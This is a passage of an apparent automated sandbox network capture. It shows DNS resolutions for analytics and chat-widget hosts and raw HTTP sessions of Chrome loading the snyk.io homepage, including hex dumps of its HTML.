                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:01.891937017 CEST1.1.1.1192.168.2.50x6f53No error (0)dl7g9llrghqi1.cloudfront.net18.245.86.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:01.891937017 CEST1.1.1.1192.168.2.50x6f53No error (0)dl7g9llrghqi1.cloudfront.net18.245.86.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:01.891937017 CEST1.1.1.1192.168.2.50x6f53No error (0)dl7g9llrghqi1.cloudfront.net18.245.86.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:01.893507004 CEST1.1.1.1192.168.2.50xf42bNo error (0)js.driftt.comdl7g9llrghqi1.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:02.064132929 CEST1.1.1.1192.168.2.50x2f59No error (0)677-thp-415.mktoresp.com134.213.193.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:02.754210949 CEST1.1.1.1192.168.2.50x9742No error (0)ws.zoominfo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:02.754694939 CEST1.1.1.1192.168.2.50x780eNo error (0)ws.zoominfo.com104.16.118.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:02.754694939 CEST1.1.1.1192.168.2.50x780eNo error (0)ws.zoominfo.com104.16.117.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.145636082 CEST1.1.1.1192.168.2.50xce52No error (0)googleads.g.doubleclick.net142.250.186.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.145982027 CEST1.1.1.1192.168.2.50xd052No error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.532937050 CEST1.1.1.1192.168.2.50x4e07No error (0)metrics.api.drift.comistio.api.drift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.532937050 CEST1.1.1.1192.168.2.50x4e07No error (0)istio.api.drift.comafe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.532937050 CEST1.1.1.1192.168.2.50x4e07No error (0)afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com34.193.113.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.532937050 CEST1.1.1.1192.168.2.50x4e07No error (0)afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com3.94.218.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.532937050 CEST1.1.1.1192.168.2.50x4e07No error (0)afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com50.16.7.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.532937050 CEST1.1.1.1192.168.2.50x4e07No error (0)afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com54.147.21.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.534147024 CEST1.1.1.1192.168.2.50xd162No error (0)conversation.api.drift.comistio.api.drift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.534147024 CEST1.1.1.1192.168.2.50xd162No error (0)istio.api.drift.comafe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.534147024 CEST1.1.1.1192.168.2.50xd162No error (0)afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com54.147.21.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.534147024 CEST1.1.1.1192.168.2.50xd162No error (0)afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com34.193.113.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.534147024 CEST1.1.1.1192.168.2.50xd162No error (0)afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com3.94.218.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.534147024 CEST1.1.1.1192.168.2.50xd162No error (0)afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com50.16.7.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.542057991 CEST1.1.1.1192.168.2.50x346eNo error (0)customer.api.drift.comafe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.542057991 CEST1.1.1.1192.168.2.50x346eNo error (0)afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com3.94.218.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.542057991 CEST1.1.1.1192.168.2.50x346eNo error (0)afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com34.193.113.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.542057991 CEST1.1.1.1192.168.2.50x346eNo error (0)afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com54.147.21.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.542057991 CEST1.1.1.1192.168.2.50x346eNo error (0)afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com50.16.7.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.549930096 CEST1.1.1.1192.168.2.50xc60bNo error (0)customer.api.drift.comafe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.551340103 CEST1.1.1.1192.168.2.50xb039No error (0)targeting.api.drift.comistio.api.drift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.551340103 CEST1.1.1.1192.168.2.50xb039No error (0)istio.api.drift.comafe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.552803993 CEST1.1.1.1192.168.2.50xbbfbNo error (0)metrics.api.drift.comistio.api.drift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.552803993 CEST1.1.1.1192.168.2.50xbbfbNo error (0)istio.api.drift.comafe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.562591076 CEST1.1.1.1192.168.2.50xf767No error (0)conversation.api.drift.comistio.api.drift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.562591076 CEST1.1.1.1192.168.2.50xf767No error (0)istio.api.drift.comafe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.570416927 CEST1.1.1.1192.168.2.50x99bdNo error (0)targeting.api.drift.comistio.api.drift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.570416927 CEST1.1.1.1192.168.2.50x99bdNo error (0)istio.api.drift.comafe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.570416927 CEST1.1.1.1192.168.2.50x99bdNo error (0)afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com34.193.113.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.570416927 CEST1.1.1.1192.168.2.50x99bdNo error (0)afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com54.147.21.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.570416927 CEST1.1.1.1192.168.2.50x99bdNo error (0)afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com50.16.7.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:03.570416927 CEST1.1.1.1192.168.2.50x99bdNo error (0)afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com3.94.218.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:04.312375069 CEST1.1.1.1192.168.2.50x90a0No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:50:04.312634945 CEST1.1.1.1192.168.2.50xe493No error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              0192.168.2.54970923.77.250.63804724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:48:50.937024117 CEST422OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:48:52.958272934 CEST372INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                              Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                                                                              Location: https://snyk.io/
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:52 GMT
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.601d4117.1729799332.30c2034
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:49:38.139369965 CEST6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              1192.168.2.54971023.77.250.63804724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:49:27.551115036 CEST510INHTTP/1.0 408 Request Time-out
                                                                                                                                                                                                                                                                                                              Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                              Mime-Version: 1.0
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:27 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                              Content-Length: 314
                                                                                                                                                                                                                                                                                                              Expires: Thu, 24 Oct 2024 19:49:27 GMT
                                                                                                                                                                                                                                                                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 52 65 71 75 65 73 74 20 54 69 6d 65 6f 75 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 52 65 71 75 65 73 74 20 54 69 6d 65 6f 75 74 3c 2f 48 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 74 69 6d 65 64 20 6f 75 74 20 77 68 69 6c 65 20 77 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 62 72 6f 77 73 65 72 27 73 20 72 65 71 75 65 73 74 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 32 26 23 34 36 3b 35 61 31 64 34 31 31 37 26 23 34 36 3b 31 37 32 39 37 39 39 33 36 37 26 23 34 36 3b 30 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 32 26 23 34 36 3b 35 61 31 64 34 31 31 37 26 23 34 36 3b 31 37 32 39 37 39 39 33 36 37 26 23 34 36 3b 30 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: <HTML><HEAD><TITLE>Request Timeout</TITLE></HEAD><BODY><H1>Request Timeout</H1>The server timed out while waiting for the browser's request.<P>Reference&#32;&#35;2&#46;5a1d4117&#46;1729799367&#46;0<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;2&#46;5a1d4117&#46;1729799367&#46;0</P></BODY></HTML>


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              0192.168.2.54971323.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:54 UTC650OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:54 UTC4121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: default-src 'self';base-uri 'none';child-src 'none';script-src 'self' ;script-src-elem 'self' 'unsafe-inline' blob: https://snyk.io https://*.snyk.io http://*.snyk.io https://*.dev.snyk.io https://*.usercentrics.eu cdn.segment.com bat.bing.com https://*.6sense.com https://*.6sc.co https://linkedin.com https://*.linkedin.com www.google.com www.google-analytics.com *.googletagmanager.com www.googleadservices.com googleads.g.doubleclick.net https://*.doubleclick.net/ ssl.google-analytics.com https://www.gstatic.com https://assets.trendemon.com https://trackingapi.trendemon.com 479-bcc-915.mktoweb.com munchkin.marketo.net https://platform.twitter.com fast.wistia.com www.gartner.com https://cdnjs.cloudflare.com https://connect.facebook.net https://*.salesloft.com https://snap.licdn.com https://*.vercel-scripts.com https://vercel.live https://js.zi-scripts.com https://tracking.intentsify.io https://js.driftt.com https://widget.drift.com;connect-src 'self' https://*.snyk.io https://*.dev.sn [TRUNCATED]
                                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"439sy3pss72xvj"
                                                                                                                                                                                                                                                                                                              Permissions-Policy: accelerometer=(), camera=(), microphone=(), usb=()
                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /en-US
                                                                                                                                                                                                                                                                                                              X-Powered-By: Next.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::vrl85-1729799334206-32f1f1ac2505
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:54 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799334.1f5fcef
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:54 UTC12263INData Raw: 30 30 30 30 43 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 2f 3e 3c 74 69 74 6c 65 3e 44 65 76 65 6c 6f 70 65 72 20 73 65 63 75 72 69 74 79 20 7c 20 53 6e 79 6b 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 66 6f 6c 6c 6f 77 2c 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><title>Developer security | Snyk</title><meta name="robots" content="index,follow,max-image-preview:large"/><meta name="descriptio
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:54 UTC16384INData Raw: 73 65 63 75 72 65 2c 20 73 74 61 79 20 73 65 63 75 72 65 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 2d 6e 61 76 2d 69 74 65 6d 22 20 64 61 74 61 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 53 75 62 20 4d 65 6e 75 20 49 74 65 6d 22 3e 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 2d 6c 69 6e 6b 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 68 72 65 66 3d 22 2f 73 6f 6c 75 74 69 6f 6e 73 2f 73 6f 66 74 77 61 72 65 2d 73 75 70 70 6c 79 2d 63 68 61 69 6e 2d 73 65 63 75 72 69 74 79 2f 22 3e 3c 69 20 63 6c 61 73 73 3d 22 67 65 6e 65 72 61 6c 2d 69 63 6f 6e 20 69 63 6f 6e 2d 73 75 70 70 6c 79 2d 63 68 61 69 6e 22 3e 3c 2f 69 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 2d 6c 69 6e 6b
                                                                                                                                                                                                                                                                                                              Data Ascii: secure, stay secure</p></div></a></li><li class="submenu-nav-item" data-component="Sub Menu Item"><a class="submenu-link" tabindex="0" href="/solutions/software-supply-chain-security/"><i class="general-icon icon-supply-chain"></i><div class="submenu-link
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:54 UTC3692INData Raw: 74 6c 65 22 3e 53 6e 79 6b e2 80 99 73 20 41 49 2d 4e 61 74 69 76 65 20 53 41 53 54 20 50 72 6f 64 75 63 74 20 50 61 73 73 65 73 20 24 31 30 30 4d 20 69 6e 20 41 52 52 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 61 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 20 74 65 72 74 69 61 72 79 20 6c 69 6e 6b 2d 73 74 72 65 74 63 68 65 64 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 68 72 65 66 3d 22 2f 6e 65 77 73 2f 73 6e 79 6b 73 2d 61 69 2d 6e 61 74 69 76 65 2d 73 61 73 74 2d 70 72 6f 64 75 63 74 2d 70 61 73 73 65 73 2d 31 30 30 6d 2d 69 6e 2d 61 72 72 2f 22 3e 52 65 61 64 20 70 72 65 73 73 20 72 65 6c 65 61 73 65 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 61 72 74 69 63 6c 65 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 63
                                                                                                                                                                                                                                                                                                              Data Ascii: tle">Snyks AI-Native SAST Product Passes $100M in ARR</p></div><a class="button tertiary link-stretched" tabindex="0" href="/news/snyks-ai-native-sast-product-passes-100m-in-arr/">Read press release</a></div></article></div></div></div></div></li><li c
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:54 UTC16384INData Raw: 68 2d 61 75 74 6f 20 64 61 72 6b 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 74 69 74 6c 65 3d 22 42 6f 6f 6b 20 61 20 6c 69 76 65 20 64 65 6d 6f 22 20 64 61 74 61 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 4e 65 78 74 20 4c 69 6e 6b 22 20 68 72 65 66 3d 22 2f 73 63 68 65 64 75 6c 65 2d 61 2d 64 65 6d 6f 2f 22 3e 42 6f 6f 6b 20 61 20 6c 69 76 65 20 64 65 6d 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 73 65 63 74 69 6f 6e 3e 3c 2f 64 69 76 3e 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 75 69 2d 73 65 63 74 69 6f 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 72 65 6c 61 74 69 76 65 20 62 72 61 6e 64 75 69 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20
                                                                                                                                                                                                                                                                                                              Data Ascii: h-auto dark" tabindex="0" title="Book a live demo" data-component="Next Link" href="/schedule-a-demo/">Book a live demo</a></div></div></div></div></div></div></section></div><section class="brandui-section"><div class="p-relative brandui-container"><div
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:54 UTC441INData Raw: 65 72 61 6c 20 4d 4c 20 6d 65 74 68 6f 64 73 2c 20 61 6e 64 20 53 6e 79 6b 20 73 65 63 75 72 69 74 79 20 65 78 70 65 72 74 69 73 65 20 74 6f 20 65 6e 73 75 72 65 20 61 63 63 75 72 61 63 79 20 77 69 74 68 6f 75 74 20 68 61 6c 6c 75 63 69 6e 61 74 69 6f 6e 73 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 72 67 2d 74 2d 73 6d 61 6c 6c 20 64 2d 66 6c 65 78 20 6d 6f 62 69 6c 65 3a 66 6c 65 78 2d 63 6f 6c 20 67 61 70 2d 6d 65 64 69 75 6d 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 20 74 65 72 74 69 61 72 79 20 6d 61 78 2d 77 2d 66 75 6c 6c 20 6d 61 78 2d 63 6f 6e 74 65 6e 74 20 6d 6f 62 69 6c 65 3a 6d 61 72 67 2d 68 2d 61 75 74 6f 20 6f 75 74 6c 69 6e 65 2d 72 65 73 65 74 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 74 69
                                                                                                                                                                                                                                                                                                              Data Ascii: eral ML methods, and Snyk security expertise to ensure accuracy without hallucinations.</p></div><div class="marg-t-small d-flex mobile:flex-col gap-medium"><a class="button tertiary max-w-full max-content mobile:marg-h-auto outline-reset" tabindex="0" ti
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 6d 6f 62 69 6c 65 3a 67 61 70 2d 6c 61 72 67 65 20 66 6c 65 78 2d 72 6f 77 2d 72 65 76 65 72 73 65 22 20 64 61 74 61 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 54 65 78 74 20 4d 65 64 69 61 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 73 2d 36 20 6d 6f 62 69 6c 65 3a 63 6f 6c 73 2d 31 32 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 3c 66 69 67 75 72 65 20 64 61 74 61 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 4d 65 64 69 61 20 41 73 73 65 74 20 43 6f 6e 74 61 69 6e 65 72 22 3e 3c 69 6d 67 20 61 6c 74 3d 22 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 77 69 64 74 68 3d 22 36 31 39 22 20 68 65 69 67 68 74 3d 22 33 39 36 22 20 64 65 63 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000mobile:gap-large flex-row-reverse" data-component="Text Media"><div class="cols-6 mobile:cols-12 d-flex flex-col justify-center items-center"><figure data-component="Media Asset Container"><img alt="" loading="lazy" width="619" height="396" deco
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC12INData Raw: 3c 61 20 68 72 65 66 3d 22 2f 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: <a href="/
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC16384INData Raw: 30 30 30 31 31 38 32 32 0d 0a 70 6f 6c 69 63 69 65 73 2f 77 65 62 73 69 74 65 2d 74 65 72 6d 73 2d 6f 66 2d 75 73 65 22 3e 57 65 62 73 69 74 65 20 54 65 72 6d 73 20 6f 66 20 55 73 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 72 65 66 65 72 65 6e 63 65 73 2e 73 6e 79 6b 2e 69 6f 2f 64 6f 6e 74 5f 73 65 6c 6c 22 3e 46 6f 72 20 43 61 6c 69 66 6f 72 6e 69 61 20 72 65 73 69 64 65 6e 74 73 3a 20 44 6f 20 6e 6f 74 20 73 65 6c 6c 20 6d 79 20 70 65 72 73 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 66 6f 6f 74 65 72 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 69 64 3d 22 5f 5f 4e 45 58 54 5f 44 41 54 41 5f 5f
